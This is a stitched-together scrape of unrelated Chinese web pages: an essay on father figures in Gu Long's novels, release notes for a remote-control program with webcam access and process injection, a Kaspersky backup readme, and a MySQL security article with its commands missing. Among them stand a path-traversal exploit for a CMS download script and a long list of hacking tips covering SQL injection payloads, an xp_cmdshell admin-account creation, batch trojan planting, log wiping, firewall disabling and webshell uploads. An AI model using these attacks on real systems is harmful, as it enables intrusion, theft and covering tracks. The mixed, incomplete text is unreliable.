父亲，是纠缠古龙一生的心结。
　　据覃贤茂的《古龙传》记载：古龙极少提起往事，因此很多朋友甚至认为古龙是香港来台的一个孤儿。直到古龙的父亲得了柏金森症住院，登报寻找古龙，他的朋友才知道，古龙的父亲也在台北。古龙从来不提他的家庭的原因，是因为古龙的父亲在孩子很小的时候，为了爱情而离开了家。这是古龙很不谅解的事，这也就是古龙萦绕於心，无法解开的一个结。
　　而这人生里永远无法消除的瘢痕，也不可避免地影响到他笔下的人物。
　　
　　古龙早期的文字纯粹是为了生活，因此在他一开始的作品中，"父亲"只是一张脸谱，仅具一个符号的作用。从缪文、裴玉，直至沈浪、俞佩玉，都是如此。
　　缪文、裴玉与父亲的交流，在《湘妃剑》、《孤星传》中，一片空白。
　　沈浪，当他不慎向假扮熊猫儿的龙四海泄露胸中的秘密，说自己与快活王不共戴天是因为私人的仇恨时，我们仅仅只能从书中只言片语中揣测那是因为他父亲沈天君死于快活王的阴谋之故。而《武林外史》一书，从始至终都没有讲明沈浪与沈天君之间是否为父子关系。
　　甚至从快活王和王怜花、白飞飞之间，你能嗅到古龙胸中关于"父亲"的那股森森戾气。白飞飞报复父亲的方式是嫁给父亲——古龙对父权的蔑视，有时几近离经叛道。
　　
　　但从1968年开始，你就可以看到古龙尝试着解开这个心结的努力。
　　《多情剑客无情剑》中，有对"父亲"的揶揄、讥刺，也有对"父亲"的刻骨仇恨，但最终，古龙安排的是寻找和宽恕。
　　金风白为他老大做暗门生意辩解，理由是：只要有朋友找他，他几乎是有求必应，所以他的开销一向很大。但他却不像你，他并没有一个做户部尚书的父亲。——李寻欢听了只能苦笑。
　　阿飞一开始进入江湖是为了替母亲白飞飞报复世人——这其中，无疑也掺杂了对他从未谋面的父亲沈浪的怨恨。但幸运的是，他遇见李寻欢后，李寻欢教会他相信人性和爱，古龙的解释是：爱永远比恨更容易让人接受。而上一代的江湖里，古龙借阿飞的母亲口说：世上最伟大的力量，就是仇恨。
　　阿飞在《多情剑客无情剑》的结局是去海上寻访仙山——古龙暗示他其实想探访的是他的父亲沈浪，那么，有理由相信的是，阿飞即便没有完全解开"父亲"这个心结，但他从内心里已能够宽恕父亲对他和他母亲的"无情"。
　　当然，书中最打动人心的，还是一个孩子对父亲的最终谅解。
　　龙小云对李寻欢的刻骨仇恨，偏执到一种不可理解的地步。一开始你会认为这是因为李寻欢废了他武功的缘故，但古龙在描写到林诗音最后拿《怜花宝鉴》去救李寻欢的时候，却道出龙小云内心真正的想法：我只是恨他为什么不是我的父亲，我也恨我自己，为什么不是他的儿子？
　　这一段话直接导致了林诗音的精神崩溃。
　　这已经是故事的高潮。
　　但古龙，仍有最高潮头上峰回路转的本事。
　　当龙啸云突然出现，点住妻子的穴道代她去救李寻欢的时候，所有的人都知道他走的是必死的路。古龙说：纵然他的觉悟只不过是因为已被逼得走投无路，也还是同样值得尊敬的。
　　于是你听到了龙小云的对父亲的忏悔：我承认，只有你才是我的父亲，我也只愿意做你的儿子，除了你，什么人我都不要，无论什么人……
　　你也听到了古龙内心的呼喊么？
　　
　　1971年，古龙在《欢乐英雄》中直言了"父亲"对子女的爱。
　　王动的父亲在王动小时候化身为一个神秘的蒙面人来传授他武功。他督促王动学艺非常严厉，动辄责骂，因为他知道儿子过于顽劣，不教点本事在江湖上太不安全。而且不用这样的传授方式，一方面难以引起儿子的兴趣；另一方面也是因为他仇人武功太高，儿子要是知道父亲的过去难免去找仇人拼命——这无疑以卵击石。
　　多年后，当王动为父亲的苦心孤诣痛哭流涕的时候，想必执笔的古龙也是黯然神伤的。
　　
　　而1975年的古龙，在他自己也做了多年的父亲后，他又是怎样在作品中重新审视"父亲"这个角色呢？
　　
　　《霸王枪》里的丁喜是大人物百里长青的私生子，但他还没有生下来的时候，百里长青就离开了他和他母亲。他在社会底层度过了悲惨的童年：三岁的时候就会捧着破碗上街去要饭，六岁的时候就学会了做扒手，为了一块冷饼趴在街头被人象野狗般毒打。只要一想起这些往事，他身上的衣服就会被汗水湿透。
　　这内心深处不为人知的创伤，使得丁喜一度甘于接受命运魔索的束缚，以为自己一生注定孤独。但他还是忍不住要去救陷入阴谋陷阱的好兄弟小马、好朋友邓定侯、心仪的女孩王大小姐……以及落入阴谋中父亲百里长青。古龙说，因为对这些人的爱，最终使得他有勇气去战胜自己的心魔。
　　我想，其实在大宝塔上，当丁喜亲耳听到百里长青在决战前请求邓定侯，若战死则他所有的产业都交给丁喜的母亲的时候，丁喜一定在那一刹那最终宽恕了父亲，因为他知道了父亲并未真正抛弃过他和他母亲。
　　
　　《拳头》中的朱云，本是狼山之王朱五太爷的独子。和狼山年轻一代的迷狼和嬉狼不同的是，他不甘于只做狼人的命运。于是在十三岁的时候偷偷到外面去闯他自己的天下。十年之后，他学到一身惊世绝艺，却忽然厌倦了，因为他发现一个人就算能练成天下无敌的功夫，也不如亲情可贵。
　　他想与父亲和解，但是又太倔强、太要少年人的面子。虽然父亲是他这一生中真正唯一敬爱的人，可是他死也不肯承认；而且总觉得自己是溜出来的，已没有脸再回去。
　　可等到他终于有勇气面对父亲的时候，朱五太爷非但已死，他的尸身还被君子狼利用来发号施令，控制了狼山上下。并给他送去三枚毒针，重创了他。
　　朱云最后依赖小马、常无意等人的协助，回到了狼山，面对父亲的尸身，泪流满面。他虽然因为年轻和误会，犯下不可挽回的过错，但他的回归，终于也完成了对自己的救赎、对父亲的补偿。
　　多年后，一位曾抛弃妻子儿女、离家远走的老人于病重时登报寻找他敏感倔强、三十年未见面的独生子时，据说古龙思虑再三，终于还是到医院看望了那位孤独的老人——从那一刹那我知道了：古龙，其实也一直就是那个倔强少年啊。
　　
　　但最令人惊艳的是，1975年的古龙，对"父亲"这个主题还作了宽恕之外的思索。《三少爷的剑》里的诸多父子之情，虽或浓或淡，却都如同燕十三船头的那壶热茶，苦涩、清冽而又芳香。
　　
　　夏侯飞山，本是武林世家红云谷第一高手，二十年前因为与大嫂间有了私情，不得不江湖蒸发，不知所踪。实质上他已悄悄回到红云谷，屈身为奴，做了少庄主夏侯星的车夫，而夏侯星，正是他和大嫂的私生子。
　　无论这个儿子多么不成材，他都默默的维护着夏侯星的利益：不仅一颗红心两手过硬地为夏侯星频频搜捕酷爱私奔的儿媳妇，也把自己对武学的全部感悟传授给儿子。只是当儿子也败在仇家后代剑下时，这个苦心孤诣的父亲才接受了自己人生的最终失败和自己已垂垂老矣的残酷现实。
　　
　　铁开诚，在大雨中出场的一幕，极有气势。他年纪轻轻，就已继承了红旗镖局的雄厚基业，他本身更具备了一代枭雄的潜质。但这一切却为他轻易的舍弃。
　　古龙解释道：他的义父铁中奇年老后雄心消退，接纳了私逃的薛可人做自己的情妇。慕容秋荻觊觎他们镖局的势力，便胁迫薛可人去挑拨他们的父子关系。但铁中奇对薛可人虽然千依百顺，却也始终完全信任铁开诚，以致最后终于被薛可人毒死。
　　铁开诚虽无铁中奇的血统，但彼此之间已有了父子的感情。为了保全铁中奇的一世英名，铁开诚宁原承担弑父篡位的罪名，从此流落江湖。
　　因此，他们之间的父子情，实质更象江湖男儿之间的惺惺相惜。
　　
　　谢家三代，更是将这父子情的沧桑和苍凉推到了极至。
　　谢王孙，武功已入化境，却完全甘于江湖中的平凡地位，安心过平淡的家庭生活，即使是家族的荣誉和儿女的死亡都不能改变。但他终究不能真正太上忘情，老妻、儿子他都放不下。
　　当他回到小楼凄凉的灯火畔，听到老妻一句枯索的絮问：儿子迟早一定会回来的，是不是？他的回应是：是的。
　　谢晓峰，为逃名宁愿在江湖的底层污泥中挣扎，他虽然时常在内心深处听到远方亲人的召唤，却仍能忍心继续漂泊。只是，当看到亲生儿子生死悬于一线的时候，他胸中的父子情终于战胜了逃名的虚无。
　　他不仅为儿子的大祸顶缸，后来还为儿子身中奇毒。谢晓峰只能用江湖人的方式给儿子还情——因为其他教育方式，古龙自身也不懂，或者说做不了。
　　小弟，一开始和阿飞、丁喜一样，自小从母亲那儿铸炼了对父亲的仇恨。他一度以自己为诱饵，差一点就将父亲捕杀。但在最关键最危急的一刻，他还是舍身救了父亲。不仅如此，当他最后看到父亲的还情，特别是以为父亲将不久于人世之后，终于原谅了父亲的一切。
　　与《拳头》不同的是，古龙没有象朱云一样给谢晓峰安排一次回归家园的救赎；与《霸王枪》不同的是，古龙没有象丁喜一样给小弟安排一个温情的结尾。
　　当父亲的阴影从小弟的人生里消淡后，他选择了和父亲一样做江湖名人的路，并娶了一个权力欲极强的女人为妻。因此，小弟是否会延续他父亲的宿命，古龙是悲观的，他在最后喟叹：你一旦做了江湖人，就永远是江湖人。
　　
　　很多年前，我曾看过一部美国电影《勇敢者的游戏》：倔强的小孩厌倦了严苛的父亲规划下的条框生活，当他得到一个可以进入未来的魔棋游戏后，他立刻选择把游戏玩到底。几十年后，他从未来回来，父母均已不在人世，留给他的只有他们生前对儿子的无穷缅怀和牵挂——他从未想过看起来永远那么古板的父母亲是这样的爱他。
　　于是，当他在某个偶然的机会变回那个倔强的小孩时，他主动走向他那原本看起来总是严肃无比的父亲，拥抱了父亲。父亲的声音一下子柔软起来：怎么了?我才离开了一会儿。
　　据说古龙到医院看望父亲时，老人神智已失，不能够与他进行任何的交流；几个月后，古龙也匆匆离开了人世。三十年恩怨，终归尘与土。
　　三十年。
　　如果用思维来测量距离，确实只需要一会儿。
　　我们也不妨在有阳光的日子里想象一会儿，当谢晓峰回到神剑山庄的小楼下，迎接他的那两双衰老憔悴的目光里，是否会立即荡起温柔的涟漪？
　　是的，我想是的。

2007年02月23号更新！Vip 2007 beta 2 版本
改进功能说明：
1.解决读取不到视频设备信息的问题.
2.加入配置记录
3.其它一些细小改进.
这是VIP2007第二个测试版本,如果你发现这个版本有什么BUG,欢迎您提出:huigezi@vip.163.com



2007年02月18号更新！Vip 2007 beta 1 版本

改进功能说明：
1.VIP2007综合了现有的三个版本优点(VIP2006/1.23/2.03)
2.安装文件从VIP2006的三个减小到2个,一个EXE和一个DLL文件.
3.现在可以支持多操作,如同时下载,上传不会阻塞其它操作. 可查看多台机器视频和屏幕等.
4.配置选项的增加,进程插入类选择,改善了捕获屏幕的速度等.
5.其它一些改进.
这是VIP2007第一个测试版本,如果你发现这个版本有什么BUG,欢迎您提出:huigezi@vip.163.com

重点说明:
1.VIP 2007 不兼容以前其它版本.
2.自定义插入进程,要选择不是服务启动的进程(不要填写如:SVCHOST.exe,LSASS.exe,WinLogon.exe).可以填写用户模式下使用的进程,如:即时通讯软件或下载工具等都可以.



【1】对远程计算机文件管理：模枋 Windows 资源管理器，可以对文件进行复制、粘贴、删除，重命名、远程运行等,可以上传下载文件(夹),智能断点续传,文件数据加密传输安全简单易用。
【2】远程控制命令：查看远程系统信息、剪切板查看、进程管理、窗口管理、服务管理、共享管理、代理服务、MS-Dos模拟,插件管理！
【3】捕获屏幕：不但可以连继的捕获远程电脑屏幕，还能把本地的鼠标及键盘传动作送到远程实现实时控制功能！
【4】视频语音，可以查看远程摄像头！,还有语音聊天功能！
【5】telnet(超级终端).
【6】注册表模拟器：远程注册表操作就像操作本地注册表一样方便!
【7】命令广播：可以对自动上线主机进行命令播，如关机、重启、打开网页，筛选符合条件的机等，点一个按钮就可以让多台机器同时关机或其它操作！
【8】服务端可以设为服务启动，支持发送多种组合键，可以轻松管理远程服务器！
【9】远程服务端自动升级功能：远程服务端可以自动升级到最新版本，不需用户手工升级，完全免去重新安装远程服务端升级的烦琐工作！
【10】专用自动上线方式：免去用户要使用WEB空间的烦恼！

点击下载

======[flash/downfile.asp过滤不严导致可下载任意文件]======


　　似乎是url都处理掉了，是不可能用../跳转目录的。但是，他判断../很奇怪，就判断url的前三个字符而已。所以，嘿嘿！前三个字符不能是../，难道我后面不能是吗？于是构造一下url参数为"uploadfile/../../conn.asp"，于是总体的地址就是http://127.0.0.1/flash/downfile.asp?url=uploadfile/../../conn.asp 。嘿嘿～～conn.asp文件下载下来了吧。

　　这套整站程序用的人还是挺多的，我甚至看到有两个黑客类的网站使用它。但是不约而同的是这个漏洞都存在。可以说，这个漏洞是通杀现在网上所有使用新云的系统的，连10.18出来的sp1都没补上。但是，很多大站都是使用sql版本的，而且主机又屏蔽了1433端口，于是，利用就成了问题。对于access 的系统，只要后台没改名，而且md5密码可以通过www.cmd5.com来查询，后台又有着数据库备份的功能，获得webshell是不成问题的。

　　ACCESS和SQL版通吃。

　　Google搜索关键字 "关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 管理登录"把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp，以源码，软件等下载站居多。

本站免费帮信息学院学生提供美国高速php+mysql空间申请

申请格式

您的用户名例如：xiaoluo

本站提供的二级域名是可以解析的

如果需要xxx.it5188.cn的绑定域名的话 请写上您要的域名例如:xiaoluo.it5188.cn

您的联系邮箱或者QQ例如:xxx@163.com

如需申请 请发送邮箱至136492889@qq.com

本人承诺 保证在两天内帮您申请到

卡巴斯基6.0(KAV、KIS通用)病毒库备份和恢复程序（无须RAR支持）
KB.EXE -------------- KAV&KIS病毒库备份程序
KU.EXE -------------- KAV&KIS病毒库恢复程序(升级到1.2版，自动查找KAV&KIS程序路径)
UPBD.DAT ------------ 病毒库恢复程序配置文件(运行KU.EXE时，由程序自动生成)
说明文件.TXT -------- 使用说明
特别说明：安装KAV或KIS后进行恢复时，请按KAV或KIS安装程序要求重起后再进行恢复！
KB.EXE 说明
本程序适用于Kaspersky Anti Virus 6.0、Kaspersky Internet Security 6.0
本程序会将Kaspersky Anti Virus 6.0或Kaspersky Internet Security 6.0
的病毒库备份到本程序的运行目录中的Bases文件夹，
请妥善保存此文件夹和文件夹内文件，以便日后使用！
程序自动识别病毒库目录，无须手动选择！只须按提示操作即可！
KU.EXE 说明
KAV&KIS病毒库恢复程序(可用于非默认路径安装KAV&KIS)
使用此程序前须先对UPCFG.INI进行配置!
本程序适用于Kaspersky Anti Virus 6.0、Kaspersky Internet Security 6.0
本程序可对本人制作的卡巴斯基6.0 病毒库备份程序生成的Bases目录进行恢复
也可支持无目录结构的Bases.zip进行恢复!
此外，这个工具包中的恢复程序（KU.EXE）还可以对
http://www.kaba365.com/?fsid=72
放出的KAV和KIS的完全升级包！进行离线升级
方法如下：
将从上述网址中下载到的KAV或KIS完整升级包解压到Bases文件夹中！运行KU.EXE就可以进行离线升级了！（你不需要对KAV或KIS软件进行任何设置）


http://www.UploadFX.com/upload/files/imagebox_1174025690_r7.rar

懶的再打字,看圖片吧
圖片:

圖片:

圖片:

圖片:

圖片:

圖片:

圖片:

附件：

anti-timer 2.02

随着网络的普及，基于网络的应用也越来越多。网络数据库就是其中之一。通过一台或几台服务器可以为很多客户提供服务，这种方式给人们带来了很多方便，但也给不法分子造成了可乘之机。由于数据都是通过网络传输的，这就可以在传输的过程中被截获，或者通过非常手段进入数据库。由于以上原因，数据库安全就显得十分重要。因此，本文就以上问题讨论了MySQL数据库在网络安全方面的一些功能。

账户安全

账户是MySQL最简单的安全措施。每一账户都由用户名、密码以及位置（一般由服务器名、IP或通配符）组成。如用户john从server1进行登录可能和john从server2登录的权限不同。

MySQL的用户结构是用户名/密码/位置。这其中并不包括数据库名。下面的两条命令为database1和database2设置了Select用户权限。


第一条命令设置了用户abc在连接数据库database1时使用password1。第二条命令设置了用户abc在连接数据库database2时使用password2。因此，用户abc在连接数据库database1和database2的密码是不一样的。

上面的设置是非常有用的。如果你只想让用户对一个数据库进行有限的访问，而对其它数据库不能访问，这样可以对同一个用户设置不同的密码。如果不这样做，当用户发现这个用户名可以访问其它数据库时，那将会造成麻烦。

MySQL使用了很多授权表来跟踪用户和这些用户的不同权限。这些表就是在mysql数据库中的MyISAM表。将这些安全信息保存在MySQL中是非常有意义的。因此，我们可以使用标准的SQL来设置不同的权限。

一般在MySQL数据库中可以使用3种不同类型的安全检查：

·登录验证

也就是最常用的用户名和密码验证。一但你输入了正确的用户名和密码，这个验证就可通过。

·授权

在登录成功后，就要求对这个用户设置它的具体权限。如是否可以删除数据库中的表等。

·访问控制

这个安全类型更具体。它涉及到这个用户可以对数据表进行什么样的操作，如是否可以编辑数据库，是否可以查询数据等等。

访问控制由一些特权组成，这些特权涉及到所何使用和操作MySQL中的数据。它们都是布尔型，即要么允许，要么不允许。下面是这些特权的列表：

·Select

Select是设定用户是否可以使用Select来查询数据。如果用户没有这个特权，那么就只能执行一些简单的Select命令，如计算表达式（Select 1+2）,或是日期转换（Select Unix_TIMESTAMP(NOW( )))等。


·Insert

·Update

·INDEX


INDEX决定用户是否可以对表的索引进行设置。如果用户没有这个权限，那么将无法设置表中的索引。


·Alter

·Create

·GRANT


如果一个用户拥有这个GRANT权限，那么他就可以将自己的权限授给别的用户。也就是说，这个用户可以和其它用户共享自己的权限。


·REFERENCES


有了REFERENCES权限，用户就可以将其它表的一个字段作为某一个表的外键约束。

除了以上的权限外，MySQL还有一些权限可以对整个MySQL进行操作。


·Reload


这个权限可以使用户有权执行各种FLUSH命令，如FLUSH TABLES, FLUSH STATUS等。


·Shutdown


这个权限允许用户关闭MySQL


·Process


通过这个权限，用户可以执行SHOW PROCESSLIST和KILL命令。这些命令可以查看MySQL的处理进程，可以通过这种方式查看SQL执行的细节。


·File


这个权限决定用户是否可以执行LOAD DATA INFILE命令。给用户这个权限要慎重，因为有这个权限的用户可以将任意的文件装载到表中，这样对MySQL是十分危险的。


·Super


这个权限允许用户终止任何查询（这些查询可能并不是这个用户执行的）。

以上几种权限是非常危险的，在给用户授权限时要非常谨慎。

MySQL中的SSL

以上的账户安全只是以普通的Socket进行数据传输的，这样非常不安全。因此，MySQL在4.1版以后提供了对SSL（Secure Scokets Layer）的支持。MySQL使用的是免费的OpenSSL库。

由于MySQL的Linux版本一般都是随Linux本身一起发布，因此，它们默认时都不使用SSL进行传输数据。如果要打开SSL功能，需要对hava_openssl变量进行设置：

MySQL的Windows版本已经将OpenSSL加入了。也面的命令是查看你的MySQL是否打开了SSL功能。



如果返回的是NO，那么说明你需要将OpenSSL编译进自己的MySQL。

在有时你可能需要将用户名和密码进行加密传输。在这时可以使用下面GRANT命令：


还可以通过 REQUIRE x509 选项进行SSL传输：


你还可以使用REQUIRE SUBJECT来指定一个特定的客户端证书来访问数据库。


也许你并不关心使用的是什么客户许可，而仅仅关心的是你的证书。那么你可以使用REQUIRE ISSUER来实现：

SSL还可以直接通过密码进行加密。可以使用REQUIRE CIPHER设置密码。



上面使用了GRANT命令对用户权限进行设置。而这些信息都是保存在授权表中，这些表是安全系统的心脏。在这些表中保存了每一个用户和客户机所具有的权限。如果正确地操作这些表，将会对数据库的安全起到积极的作用，而如果使用不慎，将是非常危险的。

下面让我们来看看MySQL中的最要的5个授权表。

user

用户表保存了用户的权限和被加密的密码。这个表负责确定哪些用户和客户机可以连接到服务器上。

host

这个表为每一个客户机分配权限，它并不考虑用户的权限。MySQL在确定是否接收还是拒绝一个连接时，首先考虑的是user表。而使用GRANT或REVOKE命令并不影响host表，我们可以通过手工方式修改这个表中的内容。

db

db表保存了数据库层的权限信息。

tables_priv

这个表存储了表的权限信息。

columns_priv

这个表保存了单独列的权限信息。通过这个表，可以将操作某一列的权限授予一个用户。

哈希加密

如果数据库保存了敏感的数据，如银行卡密码，客户信息等，你可能想将这些数据以加密的形式保存在数据库中。这样即使有人进入了你的数据库，并看到了这些数据，也很难获得其中的真实信息。

在应用程序的大量信息中，也许你只想交很小的一部分进行加密，如用户的密码等。这些密码不应该以明文的形式保存，它们应该以加密的形式保存在数据库中。一般情况下，大多数系统，这其中包括MySQL本身都是使用哈希算法对敏感数据进行加密的。

哈希加密是单向加密，也就是说，被加密的字符串是无法得到原字符串的。这种方法使用很有限，一般只使用在密码验证或其它需要验证的地方。在比较时并不是将加密字符串进行解密，而是将输入的字符串也使用同样的方法进行加密，再和数据库中的加密字符串进行比较。这样即使知道了算法并得到了加密字符串，也无法还原最初的字符串。银行卡密码就是采用的这种方式进行加密。

MySQL提供了4个函数用于哈希加密：PASSWORD, ENCRYPT, SHA1和MD5。下面让我们试一试这4个函数，看看会得到什么结果。我们以加密字符串"pa55word"为例进行说明：

让我们先来看看MD5函数



上面的每个函数都返回了一个加密后的字符串。为了区分加密字符串的大小写，最好在使用ENCRYPT生成加密字符串时，将这个字段定义成CHAR BINARY类型。

上面列举了3种加密的方法，但我认为使用MD5加密是最好的。这是因为这样做可以将明文密码显示在处理列表中或是查询日志中，这样便于跟踪。如下面的Insert语句使用插入了一条记录，其中的密码使用了MD5进行加密：


可以通过如下的语句进行密码验证：

现在网上的攻击事件越来越多，黑客都是通过什么方法来攻击我们的呢？下面我们给大家总结了黑客入侵网络的五十种方法，让大家做到有备无患。

　　1.网宽网络有限公司制作的网站基本都有注入漏洞 搜索网宽网络

　　2.搜索栏里输入

　　关键字%'and 1=1 and '%'='

　　关键字%'and 1=2 and '%'='

　　比较不同处 可以作为注入的特征字符

　　3.登陆框用户名和密码输入'or'='or' 漏洞很老但是现在很是遍地都是

　　4.我们先到www.google.com底下搜索一下Co Net MIB Ver 1.0

　　密码帐号都是 'or'='or'

　　5.挂马代码

　　6.http://www.wyyfk.com/24小时挂QQ工具

　　7.开启regedt32的SAM的管理员权限 检查HKEY_LOCAL_MACHINESAMSAM和HKEY_LOCAL_MACHINESAMSAM下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡,这方法是简单克隆,

　　net localgroup administrators还是可以看出Guest是管理员来

　　7.只要敢想,新浪也可入侵 注入点

　　http://igame.sina.com.cn/plaza/event/new/crnt_event_view.asp?event_id=59

　　微软官方网站注入点

　　http://www.microsoft.com/library/toolbar/3.0/search.aspx?View=en-us&charset=iso-8859-1&qu=

　　8.ms05016攻击工具用法 mshta.exe test.hta 文件名.后缀名 可以绑上QQ大盗木马

　　9.有sa权限sqlserver数据库、并且能sql注入支持fso+asp的服务器

　　SQL注入后，如何上传木马,

　　文章地址 http://hack123.home4u.china.com/0601.htm

　　10.QQ强制聊天代码

　　http://wpa.qq.com/msgrd?V=1&Uin=对方的qq号&Site=ioshenmue&Menu=yes

　　使用方法：把代码中的红色的“********”星号换成你想与其聊天的QQ号后复 制到浏览器的地址栏处即可。无论他是否你的好友，你无须加他为好友就能给 他发QQ消息。

　　11. mybbs论坛cookie欺骗 后台备份马

　　12.软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等

　　用法: 安装： instsrv.exe 服务名称 路径

　　卸载： instsrv.exe 服务名称 REMOVE

　　13.以动网为例数据库查找DV_LOG,在上面的查询的字段名里选l_content后面的关键字填上password2,找到的username2=%B7%E7%A4%CE%B0%D7%D2%C2&password2=01180017&username1=%B7%E7%A4%CE%B0%D7%D2%C2&Submit=%CC%ED+%BC%D3 password2=01180017就是他的登陆密码

　　14.搜索的技巧 inurl:网址

　　15.启航工作室WMS 5.0网站程序漏洞

　　在baidu 搜索Powered by: SailingStudio Website Manage System 5.0 (SP1)

　　利用动画看http://soft.77169.com/62/20050530/6824.html

　　16.很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测，也就是说，他会检测文件是不是有.jpg，那么我们要是把文件改成：ating.jpg.asp试试。。由于还是ASP结尾，所以木马不会变~

　　17.天意商务系统网上依然有 有漏洞 网站具体的样式http://www.wzgcc.org/

　　工具下载www.hack6.com

　　地址栏里，填上天意商务系统的网址就可以了，注意一定要是主页面

　　18.SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉

　　不能注入时要第一时间想到%5c暴库

　　19.这个dbinbd.asp文件插入后门的功能适用于文件名为.asp的所有access数据库不是动网论坛也一样可以使用的,后门隐蔽，几乎发现不了

　　工具使用方法动画和所有文件

　　http://www.anquanwu.com/bbs/printpage.asp?BoardID=2&ID=811

　　20.缺少xp_cmdshell时

　　尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

　　假如恢复不成功,可以尝试直接加用户(针对开3389的)

　　declare @o int

　　exec sp_oacreate 'wscript.shell',@o out

　　exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员

21.批量种植木马.bat


　　for /f %%i in (扫描地址.txt) do copy pc.exe %%iadmin$ 复制木马到扫描的计算机当中

　　for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间

　　扫描地址.txt里每个主机名一行 用\开头

　　22.搜索 Powered by Discuz!4.0.0RC3 开放头像的可利用 工具地址www.hack6.com

　　23.DV7.1用还原数据功能 还原asa木马

　　24.凡人网络购物系统V6.0 可以%5c暴库

　　25.IPB2.0.2漏洞 构造语句

　　$qpid=1) and 1=2 union select 1,2,3,4,5,6,7,8,9,10,member_login_key,12,13,14,15,16,17,18,19,1 from ibf_members where id=1 /* 暴管理员密码 想看动画到黑基里找 IPB<= 2.0.3论坛注入工具 www.hack6.com有下载

　　26. 将工具传到邮箱 在下载上右击 复制快捷方式 拥有自己了的下载空间

　　27.北京冲QB要宽带号跟绑定宽带的后4位电话,当你扫出北京款待号的密码必须是8位的密码,而且开头是6或8的才可以,因为北京的电话都是6根8开头的而且都是8位的,北京的区名海淀 东城 西城 门头沟 丰台 潮阳 宣武 通州 昌平,去http://cnc.qq.com/bbn/冲

　　28.搜索 企业网络办公系统 添'or''=' 登陆 在个人邮箱 上传asp木马

　　29.本人原创 搜索"一点点星空驿站 留言本" 默认数据库是gbmdb.mdb 很多网站用这个留言本 但是用搜索引擎搜不到 可以给大家在入寝时多个思路

　　30.在程序上传shell过程中，程序不允许包含标记符号的内容的文件上传,比如蓝屏最小 的asp木马,我们来把他的标签换一下： 保存为.asp,程序照样 执行.

　　31.目录权限设置变态的话可以用一些方法(比如serv-u溢出)将此web用户提权 可访问全站目录挂马

　　32.喜欢网页挂马的看看这篇总结文章吧

　　http://77169.com/News/hk/2005060611656.html

　　33.搜索"images/admin" 或".tw/images/admin" 可以找到些台湾的数据库

　　34.IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.

　　将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.

　　.cer 等后缀的文件夹下都可以运行任何后缀的asp木马

　　35.telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP

　　然后用#clear logg和#clear line vty *删除日志

　　36.搜索关键字:"Copyright 2003-2004 动易网络" 后面地址改成upfile_soft.asp 这样的漏洞很多

　　37.bbsxp的漏洞总结 Powered by BBSxp 5.15/Licence blog.asp中的对id 的过滤不严的漏洞 拿到管理员的前后台密码 工具：bbsxp完全版 cookies 欺骗 bbsxp 过滤了 asp 文件的上传 所以我们这里用 asa 来传马

　　38.学会总结入侵思路http://www.77169.com/News/hk/2005060811688.html

　　39.电脑坏了省去重新安装系统的方法

　　纯dos下执行，

　　xp:copy C:WINDOWS epair*.* 到c:windowssystem32config

　　2k: copy C:winnt epair*.* 到c:winntsystem32config

　　40.一般人设置啊拉QQ大盗的时候发信和收信都是同一个信箱，因此当我的机子中了此木马后没有立即杀掉进程，而是用内存编辑工具打开它的进程，查找smtp字样，就会找到它的信箱和密码了。只对1.5以前的管用.

　　41.内网控制内网 用vidc 还要有一只肉鸡 动画看黑基的

　　http://soft.77169.com/62/20050608/6878.html

　　42.有许多管理员用备份的日期做备份数据库的名字

　　比如http://www.hack6.com/bbs/databackup/20050601.mdb

　　43.动网数据库oldusername=%B5%F0%B7%C0&username2=%B5%F0%B7%C0&password2=19841202&adduser=%B5%F0%B7%C0&id=12&Submit=%B8%FC+%D0%C2

　　不知道用户名(不是%B8%F0%B7%C0) 转化这个用他本身的页面

　　http://www.hack6.com/bbs/showerr.asp?BoardID=0&ErrCodes=10,11&action=%CC%EE%D0%B4%B5%C7%C2%BC%D0%C5%CF%A2

　　%CC%EE%D0%B4%B5%C7%C2%BC%D0%C5%CF%A2这句话意思是“填写登录信息”

　　那么就把%CC%EE%D0%B4%B5%C7%C2%BC%D0%C5%CF%A2换成%B5%F0%B7%C0 可以看到用户名

　　44.对付信息监控系统 木马必须是加密的 如net user用不了就用net1 user等等 我是大连的 大连这边主机用这方法好用 可以直接传加密的马 用用黑基tyrant的方法 上传一个cmd的aspshall 用nc连接自己的nc监听端口 在web目录下写个加ftp用户的txt 本地43958用nc提交 ftp到服务器加用户

45.解决TCP/IP筛选 在注册表里有三处，分别是：


　　HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesTcpip

　　HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesTcpip

　　HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip

　　分别用

　　regedit -e D:a.reg HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip

　　regedit -e D:.reg HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesTcpip

　　regedit -e D:c.reg HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip

　　命令来导出注册表项

　　然后把三个文件里的EnableSecurityFilters"=dword:00000001，

　　改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用

　　regedit -s D:a.reg regedit -s D:.reg regedit -s D:c.reg 导入注册表即可

　　46.使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U

　　SERSoftwareMicrosoftWindowsCurrentVersionInternet Settingsones"下的1004项的值由原来十进制的0改为十六进制的3。

　　47.开3389的5种方法

　　(1)打开记事本，编辑内容如下：

　　echo [Components] > c:sql

　　echo TSEnable = on >> c:sql

　　sysocmgr /i:c:winntinfsysoc.inf /u:c:sql /q

　　编辑好后存为BAT文件，上传至肉鸡，执行。

　　(2) (对xp2000都有效) 脚本文件 本地开3389 工具:rots1.05

　　下载地址:www.netsill.com/rots.zip

